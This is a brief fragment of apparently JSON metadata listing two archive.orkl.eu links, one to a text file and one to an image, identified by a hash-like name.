"https://archive.orkl.eu/4ecba9019983b7da86f5b669323b7cbe39e7cb1e.txt", "img": "https://archive.orkl.eu/4ecba9019983b7da86f5b669323b7cbe39e7cb1e.jpg" } }